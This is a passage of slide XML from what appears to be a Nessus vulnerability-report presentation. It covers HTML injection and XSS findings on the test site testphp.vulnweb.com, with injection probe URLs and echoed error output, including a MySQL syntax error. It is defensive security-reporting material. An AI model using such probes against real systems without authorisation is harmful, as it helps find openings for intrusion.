              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a href='http://blog.mindedsecurity.com/2009/05/client-side-http-p [...] </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>------------------------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586" name="Google Shape;586;p72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="90100"/>
            <a:ext cx="65" cy="276999"/>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73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="866068"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>26. CGI Generic HTML Injections (quick test)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="592" name="Google Shape;592;p73"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341122"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="397375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2195750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>The remote web server hosts CGI scripts that fail to adequately sanitize request strings with malicious JavaScript. The remote web server may be vulnerable to IFRAME injections or cross-site scripting attacks :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- IFRAME injections allow 'virtual defacement' that might scare or anger gullible users. Such injections are sometimes implemented for 'phishing' attacks.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- XSS are extensively tested by four other scripts.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Some applications (e.g. web forums) authorize a subset of HTML without any ill effect. In this case, ignore this warning.</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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7375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                               HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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962100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>By leveraging this issue, the attacker may be able to cause arbitrary HTML to be executed in a user's browser within the security context of the affected site.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:b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7375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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875175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>restrict access to the vulnerable application. Contact the vendor for a patch or upgrade.</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593" name="Google Shape;593;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7219406" y="3927566"/>
            <a:ext cx="531223" cy="391885"/>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594" name="Google Shape;594;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10981509" y="3927566"/>
            <a:ext cx="531223" cy="391885"/>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595" name="Google Shape;595;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9257211" y="3927566"/>
            <a:ext cx="531223" cy="391885"/>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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="874776"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>CGI Generic HTML Injections (quick test)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Google Shape;601;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775063" y="1306286"/>
            <a:ext cx="10119360" cy="5181600"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Using the GET HTTP method, Nessus found that : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The following resources may be vulnerable to HTML injection : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The 'cat' parameter of the /listproducts.php CGI : /listproducts.php?cat=&lt;"abwcit%0A&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>-------- output -------- </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;!-- InstanceBeginEditable name="content_rgn" --&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;div id="content"&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘=&lt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>“abwcit </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&gt;' at line 1 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Warning: mysql_fetch_array() expects parameter 1 to be resource, b [...] </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>------------------------ </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The 'pp' parameter of the /hpp/ CGI : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/hpp/?pp=&lt;"abwcit%0A&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>-------- output -------- </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a href="?pp=12"&gt;check&lt;/a&gt;&lt;br/&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a href="params.php?p=valid&amp;pp=%3C%22abwcit%0A%3E"&gt;link1&lt;/a&gt;&lt;br/&gt;&lt;a href ="params.php?p=valid&amp;pp=&lt;"abwcit &gt;"&gt;link2&lt;/a&gt;&lt;br/&gt;&lt;form action="params.php?p=valid&amp;pp=&lt;"abwcit &gt;"&gt;&lt;input type=submit name=aaaa/&gt;&lt;/form&gt;&lt;br/&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>------------------------ </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Clicking directly on these URLs should exhibit the issue : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>(you will probably need to read the HTML source) http://testphp.vulnweb.com/listproducts.php?cat=&lt;"abwcit%0A&gt; http://testphp.vulnweb.com/hpp/?pp=&lt;"abwcit%0A&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Google Shape;602;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="90100"/>
            <a:ext cx="65" cy="276999"/>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75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512499" y="918318"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>27. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>CGI Generic XSS (quick test)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="608" name="Google Shape;608;p75"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="423675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1117600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
